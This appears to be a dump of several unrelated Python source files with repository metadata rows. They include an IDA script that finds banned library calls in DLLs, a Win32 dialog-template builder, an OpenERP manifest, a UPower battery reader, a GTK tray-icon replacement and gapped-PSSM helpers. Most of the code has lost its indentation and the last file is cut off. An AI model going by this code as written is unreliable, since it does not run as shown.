while next_chunk != 0xffffffffL:
next_chunk = idc.NextFuncFchunk(f_start, next_chunk)
if next_chunk != 0xffffffffL:
chunks.append((next_chunk, idc.GetFchunkAttr(next_chunk, idc.FUNCATTR_END)))
return chunks
def get_list_of_function_instr(addr):
'''
The function returns a list of instructions from a function
  @addr - the function entry point
  @return - a list of instruction addresses (hex offsets from the image base)
'''
f_start = addr
f_end = idc.FindFuncEnd(addr)
chunks = enumerate_function_chunks(f_start)
list_of_addr = list()
image_base = idaapi.get_imagebase(addr)
for chunk in chunks:
for head in idautils.Heads(chunk[0], chunk[1]):
# If the element is an instruction
      if head == 0xffffffffL:
raise Exception("Invalid head for parsing")
if idc.isCode(idc.GetFlags(head)):
head = head - image_base
head = str(hex(head))
head = head.replace("L", "")
head = head.replace("0x", "")
list_of_addr.append(head)
return list_of_addr
def enumerate_function_names():
'''
The function enumerates all functions in a dll.
  @return - dictionary {function_name : list of corresponding instruction offsets}
'''
func_name = dict()
for seg_ea in idautils.Segments():
# For each of the functions
function_ea = seg_ea
while function_ea != 0xffffffffL:
function_name = idc.GetFunctionName(function_ea)
# if already analyzed
if func_name.get(function_name, None) != None:
function_ea = idc.NextFunction(function_ea)
continue
image_base = idaapi.get_imagebase(function_ea)
addr = function_ea - image_base
addr = str(hex(addr))
addr = addr.replace("L", "")
addr = addr.replace("0x", "")
func_name[function_name] = get_list_of_function_instr(function_ea)
function_ea = idc.NextFunction(function_ea)
return func_name
def search_dangerous_functions():
''' The function searches for all potentially dangerous library calls in a module
  @return - tuple<a list of instruction lists for the potentially dangerous libcalls found,
                  a list of the names of potentially dangerous libcalls found in the module>
'''
global list_of_banned_functions, list_of_not_recommended_functions
''' key - name, value - list of (instructions - module offset) '''
func_names = dict()
list_of_instrs = list()
list_of_func_names = list()
func_names = enumerate_function_names()
for banned_function in list_of_banned_functions:
if banned_function in func_names:
list_of_instrs.append(func_names[banned_function])
print 'Found banned function ', banned_function
list_of_func_names.append(banned_function)
continue
elif ("_" + banned_function) in func_names:
list_of_instrs.append(func_names["_" + banned_function])
print 'Found banned function ', "_" + banned_function
list_of_func_names.append("_" + banned_function)
continue
for not_recommended_func in list_of_not_recommended_functions:
if not_recommended_func in func_names:
list_of_instrs.append(func_names[not_recommended_func])
print 'Found not recommended function ', not_recommended_func
list_of_func_names.append(not_recommended_func)
continue
elif ("_" + not_recommended_func) in func_names:
list_of_instrs.append(func_names["_" + not_recommended_func])
print 'Found not recommended function ', "_" + not_recommended_func
list_of_func_names.append("_" + not_recommended_func)
continue
return list_of_instrs,list_of_func_names
def get_unique(lists_of_instr):
''' The function returns a list of unique instructions from the list of instructions
  @lists_of_instr - a list of instruction lists
@return a list of unique instructions
'''
result_list = list()
for list_of_instr in lists_of_instr:
for instr in list_of_instr:
if instr not in result_list:
result_list.append(instr)
return result_list
def save_results(lists_of_instr, list_of_func_names):
''' The function saves results in a file
  @lists_of_instr - a list of instruction lists to save
  @list_of_func_names - a list of function names to save
'''
one_file = "sysdlls_instr_to_instrument.txt"
analyzed_file = idc.GetInputFile()
analyzed_file = analyzed_file.replace(".","_")
current_time = strftime("%Y-%m-%d_%H-%M-%S")
file_name = WINHE_RESULTS_DIR + "\\" + one_file
file_log = WINHE_RESULTS_DIR + "\\" + analyzed_file + "_" + current_time + ".txt"
file = open(file_name, 'a')
log = open(file_log, 'w')
analyzed_file = analyzed_file.lower()
list_of_instr = get_unique(lists_of_instr)
for instr in list_of_instr:
file.write(idaapi.get_input_file_path().lower() + "!" + str(instr) + "\n")
log.write(str(len(list_of_func_names)) + "\n")
for name in list_of_func_names:
log.write(name + "\n")
file.close()
log.close()
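# Format of the lines appended to sysdlls_instr_to_instrument.txt (the offset
# below is hypothetical): "<lower-cased dll path>!<instruction offset from the
# image base, hex without the 0x prefix>", e.g.
#   c:\windows\system32\msvcrt.dll!1a2f3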
def init_analysis():
results = search_dangerous_functions()
save_results(results[0], results[1])
def main():
global WINHE_RESULTS_DIR
print "Start analysis"
  idc.Wait() # wait until IDA finishes its auto-analysis
DEPTH_LEVEL = os.getenv('DEPTH_LEVEL')
auto_mode = 0
  # set the WINHE_RESULTS_DIR environment variable in the shell in case you want
  # to run IDA in silent (batch) mode.
WINHE_RESULTS_DIR = os.getenv('WINHE_RESULTS_DIR')
if WINHE_RESULTS_DIR == None:
WINHE_RESULTS_DIR = os.getcwd()
else:
auto_mode = 1
print "saving results in ", WINHE_RESULTS_DIR
init_analysis()
if auto_mode == 1:
Exit(0)
if __name__ == "__main__":
main()
| bsd-2-clause | -7,655,870,875,429,818,000 | 44.612403 | 91 | 0.611404 | false |
Answeror/lit | pywingui/dialog.py | 1 | 14777 | ## Copyright (c) 2003 Henk Punt
## Permission is hereby granted, free of charge, to any person obtaining
## a copy of this software and associated documentation files (the
## "Software"), to deal in the Software without restriction, including
## without limitation the rights to use, copy, modify, merge, publish,
## distribute, sublicense, and/or sell copies of the Software, and to
## permit persons to whom the Software is furnished to do so, subject to
## the following conditions:
## The above copyright notice and this permission notice shall be
## included in all copies or substantial portions of the Software.
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
## NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
## LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
## OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
## WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
## Thanx to Brad Clements for this contribution!
from .version_microsoft import WINVER
from types import IntType, LongType
from ctypes import *
from .windows import *
from .wtl_core import *
from .comctl import *
memcpy = cdll.msvcrt.memcpy
# Dialog Box Template Styles
DS_ABSALIGN = 0x01
DS_SYSMODAL = 0x02
DS_LOCALEDIT = 0x20 # Edit items get Local storage
DS_SETFONT = 0x40 # User specified font for Dlg controls
DS_MODALFRAME = 0x80 # Can be combined with WS_CAPTION
DS_NOIDLEMSG = 0x100 # WM_ENTERIDLE message will not be sent
DS_SETFOREGROUND = 0x200 # not in win3.1
if WINVER >= 0x0400:
DS_3DLOOK = 0x0004
DS_FIXEDSYS = 0x0008
DS_NOFAILCREATE = 0x0010
DS_CONTROL = 0x0400
DS_CENTER = 0x0800
DS_CENTERMOUSE = 0x1000
DS_CONTEXTHELP = 0x2000
DS_SHELLFONT = DS_SETFONT | DS_FIXEDSYS
#if(_WIN32_WCE >= 0x0500)
#DS_USEPIXELS = 0x8000L
# Dialog Codes
DLGC_WANTARROWS = 0x0001 # Control wants arrow keys
DLGC_WANTTAB = 0x0002 # Control wants tab keys
DLGC_WANTALLKEYS = 0x0004 # Control wants all keys
DLGC_WANTMESSAGE = 0x0004 # Pass message to control
DLGC_HASSETSEL = 0x0008 # Understands EM_SETSEL message
DLGC_DEFPUSHBUTTON = 0x0010 # Default pushbutton
DLGC_UNDEFPUSHBUTTON = 0x0020 # Non-default pushbutton
DLGC_RADIOBUTTON = 0x0040 # Radio button
DLGC_WANTCHARS = 0x0080 # Want WM_CHAR messages
DLGC_STATIC = 0x0100 # Static item: don't include
DLGC_BUTTON = 0x2000 # Button item: can be checked
class StringOrOrd:
"""Pack up a string or ordinal"""
def __init__(self, value):
if value is None or value == "":
self.value = c_ushort(0)
elif type(value) in (IntType, LongType):
# treat as an atom
if not value:
self.value = c_ushort(0) # 0 is not a valid atom
else:
ordinaltype = c_ushort * 2
ordinal = ordinaltype(0xffff, value)
self.value = ordinal
else:
value = str(value)
mbLen = MultiByteToWideChar(CP_ACP, 0, value, -1, 0, 0)
if mbLen < 1:
raise RuntimeError("Could not determine multibyte string length for %s" % \
repr(value))
#this does not work for me:, why needed?
#if (mbLen % 2):
# mbLen += 1 # round up to next word in size
stringtype = c_ushort * mbLen
string = stringtype()
result = MultiByteToWideChar(CP_ACP, 0, value, -1, addressof(string), sizeof(string))
if result < 1:
raise RuntimeError("could not convert multibyte string %s" % repr(value))
self.value = string
def __len__(self):
return sizeof(self.value)
class DialogTemplate(WindowsObject):
__dispose__ = GlobalFree
_window_class_ = None
_window_style_ = WS_CHILD
_window_style_ex_ = 0
_class_font_size_ = 8
_class_font_name_ = "MS Sans Serif"
def __init__(self,
wclass = None, # the window class
title = "",
menu=None,
style = None,
exStyle = None,
fontSize=None,
fontName=None,
rcPos = RCDEFAULT,
orStyle = None,
orExStyle = None,
nandStyle = None,
nandExStyle = None,
items=[]):
if wclass is not None:
wclass = StringOrOrd(wclass)
else:
wclass = StringOrOrd(self._window_class_)
title = StringOrOrd(title)
menu = StringOrOrd(menu)
if style is None:
style = self._window_style_
if exStyle is None:
exStyle = self._window_style_ex_
if orStyle:
style |= orStyle
if orExStyle:
exStyle |= orExStyle
if nandStyle:
style &= ~nandStyle
if rcPos.left == CW_USEDEFAULT:
cx = 50
x = 0
else:
cx = rcPos.right
x = rcPos.left
if rcPos.top == CW_USEDEFAULT:
cy = 50
y = 0
else:
cy = rcPos.bottom
y = rcPos.top
if style & DS_SETFONT:
if fontSize is None:
fontSize = self._class_font_size_
if fontName is None:
fontName = StringOrOrd(self._class_font_name_)
else:
fontSize = None
fontName = None
header = DLGTEMPLATE()
byteCount = sizeof(header)
byteCount += len(wclass) + len(title) + len(menu)
if fontName or fontSize:
byteCount += 2 + len(fontName)
d, rem = divmod(byteCount, 4) # align on dword
byteCount += rem
itemOffset = byteCount # remember this for later
for i in items:
byteCount += len(i)
valuetype = c_ubyte * byteCount
value = valuetype()
header = DLGTEMPLATE.from_address(addressof(value))
# header is overlayed on value
header.exStyle = exStyle
header.style = style
header.cDlgItems = len(items)
header.x = x
header.y = y
header.cx = cx
header.cy = cy
offset = sizeof(header)
# now, memcpy over the menu
memcpy(addressof(value)+offset, addressof(menu.value), len(menu)) # len really returns sizeof menu.value
offset += len(menu)
# and the window class
memcpy(addressof(value)+offset, addressof(wclass.value), len(wclass)) # len really returns sizeof wclass.value
offset += len(wclass)
# now copy the title
memcpy(addressof(value)+offset, addressof(title.value), len(title))
offset += len(title)
if fontSize or fontName:
fsPtr = c_ushort.from_address(addressof(value)+offset)
fsPtr.value = fontSize
offset += 2
# now copy the fontname
memcpy(addressof(value)+offset, addressof(fontName.value), len(fontName))
offset += len(fontName)
# and now the items
assert offset <= itemOffset, "offset %d beyond items %d" % (offset, itemOffset)
offset = itemOffset
for item in items:
memcpy(addressof(value)+offset, addressof(item.value), len(item))
offset += len(item)
assert (offset % 4) == 0, "Offset not dword aligned for item"
self.m_handle = GlobalAlloc(0, sizeof(value))
memcpy(self.m_handle, addressof(value), sizeof(value))
self.value = value
def __len__(self):
return sizeof(self.value)
class DialogItemTemplate(object):
_window_class_ = None
_window_style_ = WS_CHILD|WS_VISIBLE
_window_style_ex_ = 0
def __init__(self,
wclass = None, # the window class
id = 0, # the control id
title = "",
style = None,
exStyle = None,
rcPos = RCDEFAULT,
orStyle = None,
orExStyle = None,
nandStyle = None,
nandExStyle = None):
if not self._window_class_ and not wclass:
raise ValueError("A window class must be specified")
if wclass is not None:
wclass = StringOrOrd(wclass)
else:
wclass = StringOrOrd(self._window_class_)
title = StringOrOrd(title)
if style is None:
style = self._window_style_
if exStyle is None:
exStyle = self._window_style_ex_
if orStyle:
style |= orStyle
if orExStyle:
exStyle |= orExStyle
if nandStyle:
style &= ~nandStyle
if rcPos.left == CW_USEDEFAULT:
cx = 50
x = 0
else:
cx = rcPos.right
x = rcPos.left
if rcPos.top == CW_USEDEFAULT:
cy = 50
y = 0
else:
cy = rcPos.bottom
y = rcPos.top
header = DLGITEMTEMPLATE()
byteCount = sizeof(header)
byteCount += 2 # two bytes for extraCount
byteCount += len(wclass) + len(title)
d, rem = divmod(byteCount, 4)
byteCount += rem # must be a dword multiple
valuetype = c_ubyte * byteCount
value = valuetype()
header = DLGITEMTEMPLATE.from_address(addressof(value))
# header is overlayed on value
header.exStyle = exStyle
header.style = style
header.x = x
header.y = y
header.cx = cx
header.cy = cy
header.id = id
# now, memcpy over the window class
offset = sizeof(header)
memcpy(addressof(value)+offset, addressof(wclass.value), len(wclass))
# len really returns sizeof wclass.value
offset += len(wclass)
# now copy the title
memcpy(addressof(value)+offset, addressof(title.value), len(title))
offset += len(title)
extraCount = c_ushort.from_address(addressof(value)+offset)
extraCount.value = 0
self.value = value
def __len__(self):
return sizeof(self.value)
PUSHBUTTON = 0x80
EDITTEXT = 0x81
LTEXT = 0x82
LISTBOX = 0x83
SCROLLBAR = 0x84
COMBOBOX = 0x85
class PushButton(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_TABSTOP
class DefPushButton(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_TABSTOP|BS_DEFPUSHBUTTON
class GroupBox(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|BS_GROUPBOX
class EditText(DialogItemTemplate):
_window_class_ = EDITTEXT
_window_style_ = WS_CHILD|WS_VISIBLE|WS_BORDER|WS_TABSTOP
class StaticText(DialogItemTemplate):
_window_class_ = LTEXT
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP
class ListBox(DialogItemTemplate):
_window_class_ = LISTBOX
_window_style_ = LBS_STANDARD
class ScrollBar(DialogItemTemplate):
_window_class_ = SCROLLBAR
_window_style_ = WS_CHILD|WS_VISIBLE|WS_TABSTOP|SBS_VERT|SBS_RIGHTALIGN
class ComboBox(DialogItemTemplate):
_window_class_ = COMBOBOX
_window_style_ = WS_VISIBLE|WS_CHILD|WS_OVERLAPPED|WS_VSCROLL|WS_TABSTOP|CBS_DROPDOWNLIST
class RadioButton(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP|WS_TABSTOP|BS_RADIOBUTTON
class AutoRadioButton(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP|WS_TABSTOP|BS_AUTORADIOBUTTON
class CheckBox(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP|WS_TABSTOP|BS_CHECKBOX
class AutoCheckBox(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP|WS_TABSTOP|BS_AUTOCHECKBOX
class Dialog(Window):
"""supports _dialog_id_ and _dialog_module_ class properties or
use _dialog_template_"""
_dialog_template_ = None
_dialog_module_ = None
_dialog_id_ = None
def __init__(self, template = None, id = None, module = None):
"""module and dlgid can be passed as parameters or be given as class properties"""
self.module = None
self.id = None
self.template = None
if template or self._dialog_template_:
self.template = template or self._dialog_template_
elif module or self._dialog_module_:
self.module = module or self._dialog_module_
self.id = id or self._dialog_id_
if self.module and type(self.module) == type(''): #module is given as path name
self.module = LoadLibrary(self.module)
self.m_handle = 0 #filled in on init dialog
def DoModal(self, parent = 0, center = 1):
self.center = center
if self.template:
return DialogBoxIndirectParam(self.module,
self.template.handle,
handle(parent),
DialogProc(self.DlgProc),
0)
else:
return DialogBoxParam(self.module, self.id, handle(parent),
DialogProc(self.DlgProc), 0)
def DlgProc(self, hwnd, uMsg, wParam, lParam):
handled, result = self._msg_map_.Dispatch(self, hwnd, uMsg, wParam, lParam)
return result
def GetDlgItem(self, nIDDlgItem, windowClass = None):
"""specify window class to get a 'Venster' wrapped control"""
hWnd = GetDlgItem(self.handle, nIDDlgItem)
if hWnd and windowClass:
return windowClass(hWnd = hWnd)
else:
return hWnd
def EndDialog(self, exitCode):
EndDialog(self.handle, exitCode)
def OnOK(self, event):
self.EndDialog(IDOK)
def OnCancel(self, event):
self.EndDialog(IDCANCEL)
def OnInitDialog(self, event):
self.m_handle = event.handle
if self.center: self.CenterWindow()
return 0
_msg_map_ = MSG_MAP([MSG_HANDLER(WM_INITDIALOG, OnInitDialog),
CMD_ID_HANDLER(IDOK, OnOK),
CMD_ID_HANDLER(IDCANCEL, OnCancel)])
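# Minimal usage sketch (hypothetical layout values, not part of the original
# module). It assumes RECT, WS_CAPTION, WS_SYSMENU and IDOK are provided by the
# wildcard imports above; right/bottom of rcPos are used as width/height in
# dialog units:
#
#   template = DialogTemplate(title="About",
#                             style=WS_CAPTION | WS_SYSMENU | DS_MODALFRAME | DS_SETFONT,
#                             rcPos=RECT(0, 0, 180, 90),
#                             items=[StaticText(id=100, title="Hello, world",
#                                               rcPos=RECT(10, 10, 160, 12)),
#                                    DefPushButton(id=IDOK, title="OK",
#                                                  rcPos=RECT(65, 65, 50, 14))])
#
#   class AboutDialog(Dialog):
#       _dialog_template_ = template
#
#   AboutDialog().DoModal()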
| mit | -6,103,811,622,903,813,000 | 31.264192 | 121 | 0.582662 | false |
3dfxsoftware/cbss-addons | mrp_advance/mrp_routing_cost/__openerp__.py | 1 | 2452 | # -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
###############Credits######################################################
# Coded by: [email protected],
# Planified by: Nhomar Hernandez
# Finance by: Helados Gilda, C.A. http://heladosgilda.com.ve
# Audited by: Humberto Arocha [email protected]
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
{
"name" : "Calcular de costo teorico MRP" ,
"version" : "0.1" ,
"depends" : ['mrp' ,
] ,
"author" : "Openerp Venezuela" ,
"description" : """
    What this module does:
    Adds a cost management feature for production costing on the mrp.bom object.
    -- Sums all cost elements on a routing
    -- Adds a cost concept to routings
""" ,
"website" : "http://openerp.com.ve" ,
"category" : "Generic Modules/MRP" ,
"init_xml" : [
],
"demo_xml" : [
],
"update_xml" : [
'mrp_routing_view.xml' ,
],
"active": False ,
"installable": True ,
}
| gpl-2.0 | -7,714,735,948,409,343,000 | 50.083333 | 81 | 0.434747 | false |
atareao/cpu-g | src/upower.py | 1 | 7755 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
#
# CPU-G is a program that displays information about your CPU,
# RAM, Motherboard and some general information about your System.
#
# Copyright © 2009 Fotis Tsamis <ftsamis at gmail dot com>.
# Copyright © 2016-2019 Lorenzo Carbonell (aka atareao)
# <lorenzo.carbonell.cerezo at gmail dot com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import dbus
from collections import namedtuple
from functools import partial
from comun import _
def convert(dbus_obj):
"""Converts dbus_obj from dbus type to python type.
:param dbus_obj: dbus object.
:returns: dbus_obj in python type.
"""
_isinstance = partial(isinstance, dbus_obj)
ConvertType = namedtuple('ConvertType', 'pytype dbustypes')
pyint = ConvertType(int, (dbus.Byte, dbus.Int16, dbus.Int32, dbus.Int64,
dbus.UInt16, dbus.UInt32, dbus.UInt64))
pybool = ConvertType(bool, (dbus.Boolean, ))
pyfloat = ConvertType(float, (dbus.Double, ))
pylist = ConvertType(lambda _obj: list(map(convert, dbus_obj)),
(dbus.Array, ))
pytuple = ConvertType(lambda _obj: tuple(map(convert, dbus_obj)),
(dbus.Struct, ))
types_str = (dbus.ObjectPath, dbus.Signature, dbus.String)
pystr = ConvertType(str, types_str)
pydict = ConvertType(
lambda _obj: dict(zip(map(convert, dbus_obj.keys()),
map(convert, dbus_obj.values())
)
),
(dbus.Dictionary, )
)
for conv in (pyint, pybool, pyfloat, pylist, pytuple, pystr, pydict):
if any(map(_isinstance, conv.dbustypes)):
return conv.pytype(dbus_obj)
return dbus_obj
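# For example: convert(dbus.Boolean(True)) -> True, convert(dbus.Int32(5)) -> 5,
# and dbus Arrays / Dictionaries are converted element-wise to lists / dicts.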
class BatteryDriver():
def __init__(self):
bus = dbus.SystemBus()
bat0_object = bus.get_object(
'org.freedesktop.UPower',
'/org/freedesktop/UPower/devices/battery_BAT0')
self.__statistics = bat0_object.get_dbus_method(
'GetStatistics',
'org.freedesktop.UPower.Device')
self.__history = bat0_object.get_dbus_method(
'GetHistory',
'org.freedesktop.UPower.Device')
self.bat0 = dbus.Interface(bat0_object,
'org.freedesktop.DBus.Properties')
def __get(self, parameter):
return self.bat0.Get('org.freedesktop.UPower.Device', parameter)
def get_native_path(self):
return self.__get('NativePath')
def get_vendor(self):
return self.__get('Vendor')
def get_model(self):
return self.__get('Model')
def get_serial(self):
return self.__get('Serial')
def get_update_time(self):
return self.__get('UpdateTime')
def get_type(self):
ans = self.__get('Type')
if ans == 0:
return _('Unknown')
elif ans == 1:
return _('Line Power')
elif ans == 2:
return _('Battery')
elif ans == 3:
return _('Ups')
elif ans == 4:
return _('Monitor')
elif ans == 5:
return _('Mouse')
elif ans == 6:
return _('Keyboard')
elif ans == 7:
return _('Pda')
elif ans == 8:
return _('Phone')
return _('Unknown')
def get_power_supply(self):
return convert(self.__get('PowerSupply'))
def get_has_history(self):
return convert(self.__get('HasHistory'))
def get_online(self):
return convert(self.__get('Online'))
def get_energy(self):
return convert(self.__get('Energy')) # Wh
def get_energy_empty(self):
return self.__get('EnergyEmpty')
def get_energy_full(self):
return self.__get('EnergyFull')
def get_energy_full_design(self):
return self.__get('EnergyFullDesign')
def get_energy_rate(self):
return self.__get('EnergyRate')
def get_voltage(self): # v
return self.__get('Voltage')
def get_time_to_empty(self): # s
return self.__get('TimeToEmpty')
def get_time_to_full(self): # s
return self.__get('TimeToFull')
def get_percentage(self):
return self.__get('Percentage')
def get_is_present(self):
return convert(self.__get('IsPresent'))
def get_state(self):
ans = self.__get('State')
if ans == 0:
return _('Unknown')
elif ans == 1:
return _('Charging')
elif ans == 2:
return _('Discharging')
elif ans == 3:
return _('Empty')
elif ans == 4:
return _('Fully charged')
elif ans == 5:
return _('Pending charge')
elif ans == 6:
return _('Pending discharge')
return _('Unknown')
    def get_capacity(self):  # capacity < 75% suggests renewing the battery
return self.__get('Capacity')
def get_technology(self):
ans = self.__get('Technology')
if ans == 0:
return _('Unknown')
elif ans == 1:
return _('Lithium ion')
elif ans == 2:
return _('Lithium polymer')
elif ans == 3:
return _('Lithium iron phosphate')
elif ans == 4:
return _('Lead acid')
elif ans == 5:
return _('Nickel cadmium')
elif ans == 6:
return _('Nickel metal hydride')
return _('Unknown')
def get_statistics_discharging(self):
return convert(self.__statistics('discharging'))
def get_statistics_charging(self):
return convert(self.__statistics('charging'))
def get_history_rate(self, ndata=1000):
'''
time: The time value in seconds from the gettimeofday() method.
value: the rate in W.
state: The state of the device, for instance charging or discharging.
'''
return convert(self.__history('rate', 0, ndata))
def get_history_charge(self, ndata=1000):
'''
time: The time value in seconds from the gettimeofday() method.
value: the charge in %.
state: The state of the device, for instance charging or discharging.
'''
return convert(self.__history('charge', 0, ndata))
if __name__ == '__main__':
bd = BatteryDriver()
print(bd.get_native_path())
print(bd.get_vendor())
print(bd.get_model())
print(bd.get_serial())
print(bd.get_update_time())
print(bd.get_type())
print(bd.get_power_supply())
print(bd.get_has_history())
print(bd.get_online())
print(bd.get_energy())
print(bd.get_energy_empty())
print(bd.get_energy_full())
print(bd.get_energy_full_design())
print(bd.get_energy_rate())
print(bd.get_voltage())
print(bd.get_time_to_empty())
print(bd.get_time_to_full())
print(bd.get_percentage())
print(bd.get_is_present())
print(bd.get_state())
print(bd.get_capacity())
print(bd.get_technology())
print(bd.get_statistics_discharging())
print(bd.get_statistics_charging())
print(bd.get_history_rate())
print(bd.get_history_charge())
| gpl-3.0 | -4,603,124,261,284,974,600 | 30.644898 | 77 | 0.58042 | false |
maikelwever/gtkuttle | appindicator_replacement.py | 1 | 2820 | #=========================
#
# AppIndicator for GTK
# drop-in replacement
#
# Copyright 2010
# Nathan Osman
#
#=========================
#
# Original source unknown.
# I downloaded this from:
# https://github.com/captn3m0/hackertray
# If you made this gem, please let me know.
#
# They hardcoded the icon file path in here,
# so i'll do the same.
#
#=========================
# We require PyGTK
import gtk
import gobject
# We also need os and sys
import os
# Types
CATEGORY_APPLICATION_STATUS = 0
# Status
STATUS_ACTIVE = 0
STATUS_ATTENTION = 1
# Locations to search for the given icon
def get_icon_filename(icon_name):
# Determine where the icon is
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'icons', 'gtkuttle_{0}.png'.format(icon_name)))
# The main class
class Indicator:
# Constructor
def __init__ (self,unknown,icon,category):
# Store the settings
self.inactive_icon = get_icon_filename("down")
self.active_icon = get_icon_filename("down")
# Create the status icon
self.icon = gtk.StatusIcon()
# Initialize to the default icon
self.icon.set_from_file(self.inactive_icon)
# Set the rest of the vars
self.menu = None # We have no menu yet
def set_menu(self,menu):
# Save a copy of the menu
self.menu = menu
# Now attach the icon's signal
# to the menu so that it becomes displayed
# whenever the user clicks it
self.icon.connect("activate", self.show_menu)
def set_status(self, status):
# Status defines whether the active or inactive
# icon should be displayed.
if status == STATUS_ACTIVE:
self.icon.set_from_file(self.inactive_icon)
else:
self.icon.set_from_file(self.active_icon)
def set_label(self, label):
self.icon.set_title(label)
return
def set_icon(self, icon):
# Set the new icon
self.icon.set_from_file(get_icon_filename(icon))
def set_attention_icon(self, icon):
# Set the icon filename as the attention icon
self.active_icon = get_icon_filename(icon)
def show_menu(self, widget):
# Show the menu
self.menu.popup(None,None,None,0,0)
# Get the location and size of the window
mouse_rect = self.menu.get_window().get_frame_extents()
self.x = mouse_rect.x
self.y = mouse_rect.y
self.right = self.x + mouse_rect.width
self.bottom = self.y + mouse_rect.height
# Set a timer to poll the menu
self.timer = gobject.timeout_add(100, self.check_mouse)
def check_mouse(self):
if not self.menu.get_window().is_visible():
return
# Now check the global mouse coords
root = self.menu.get_screen().get_root_window()
x,y,z = root.get_pointer()
if x < self.x or x > self.right or y < self.y or y > self.bottom:
self.hide_menu()
else:
return True
def hide_menu(self):
self.menu.popdown()
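# Hedged usage sketch (an addition, not part of the original file; mirrors the
# libappindicator-style calls this class stands in for -- the gtk.Menu is
# built by the caller):
#     ind = Indicator("gtkuttle", "down", CATEGORY_APPLICATION_STATUS)
#     ind.set_menu(menu)
#     ind.set_attention_icon("up")
#     ind.set_status(STATUS_ACTIVE)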
| gpl-3.0 | 7,842,098,730,820,717,000 | 21.204724 | 111 | 0.658511 | false |
JohnReid/biopsy | Python/biopsy/gapped_pssms/__init__.py | 1 | 3770 | #
# Copyright John Reid 2006
#
import numpy, numpy.random, scipy.special, math
from _maths import *
from _generate import *
from _generate_2 import *
from _variational import *
from gapped_pssms import *
from weblogo import *
#
# Try to import C++ part of module if installed.
#
try:
from _gapped_pssms import *
#
# The c implementation does not hold the data as numpy arrays
# so provide some functions to create numpy arrays from the data
#
def _gapped_pssm_alpha_array( model ):
"""Beta prior parameters for gamma: the likelihood of a gap"""
return numpy.array(
[
model.alpha( i )
for i in xrange( 2 )
],
dtype = numpy.float64
)
VariationalModel_C.alpha_array = _gapped_pssm_alpha_array
def _gapped_pssm_varphi_array( model ):
"Dirichlet prior parameters for background distribution"
return numpy.array(
[
model.varphi( i )
for i in xrange( 4 )
],
dtype = numpy.float64
)
VariationalModel_C.varphi_array = _gapped_pssm_varphi_array
def _gapped_pssm_phi_array( model ):
"Dirichlet prior parameters for pssm distribution"
return numpy.array(
[
model.phi( i )
for i in xrange( 4 )
],
dtype = numpy.float64
)
VariationalModel_C.phi_array = _gapped_pssm_phi_array
def _gapped_pssm_lambda_array( model ):
"Variational parameter for gamma"
return numpy.array(
[
model.lambda_( i )
for i in xrange( 2 )
],
dtype = numpy.float64
)
VariationalModel_C.lambda_array = _gapped_pssm_lambda_array
def _gapped_pssm_eta_array( model ):
"Variational parameter for location of the gap"
return numpy.array(
[
model.eta( i )
for i in xrange( model.K - 1 )
],
dtype = numpy.float64
)
VariationalModel_C.eta_array = _gapped_pssm_eta_array
def _gapped_pssm_mu_array( model ):
"Variational parameter for g: has_gap variable"
return numpy.array(
[
model.mu( i )
for i in xrange( model.N )
],
dtype = numpy.float64
)
VariationalModel_C.mu_array = _gapped_pssm_mu_array
def _gapped_pssm_omega_array( model ):
"Variational parameters for background and pss distributions"
return numpy.array(
[
[
model.omega( r, x )
for x in xrange( 4 )
]
for r in xrange( model.K+1 )
],
dtype = numpy.float64
)
VariationalModel_C.omega_array = _gapped_pssm_omega_array
def _gapped_pssm_nu_sequence( model ):
"Variational parameters for start positions of sites"
return [
numpy.array(
[
model.nu( n, i )
for i in xrange( 2 * (model.sequence_length( n ) - model.K) )
],
dtype = numpy.float64
)
for n in xrange( model.N )
]
VariationalModel_C.nu_sequence = _gapped_pssm_nu_sequence
except ImportError:
import warnings
warnings.warn('Could not import C++ gapped PSSM module')
| mit | -4,675,622,362,759,512,000 | 30.416667 | 93 | 0.491777 | false |
jpurplefox/PokeMovesetEvaluator | moves.py | 1 | 1267 | class Move():
def __init__(self, name, power, cooldown, energy):
self.name = name
self.power = power
self.cooldown = cooldown
self.energy = energy
def get_total_power(self):
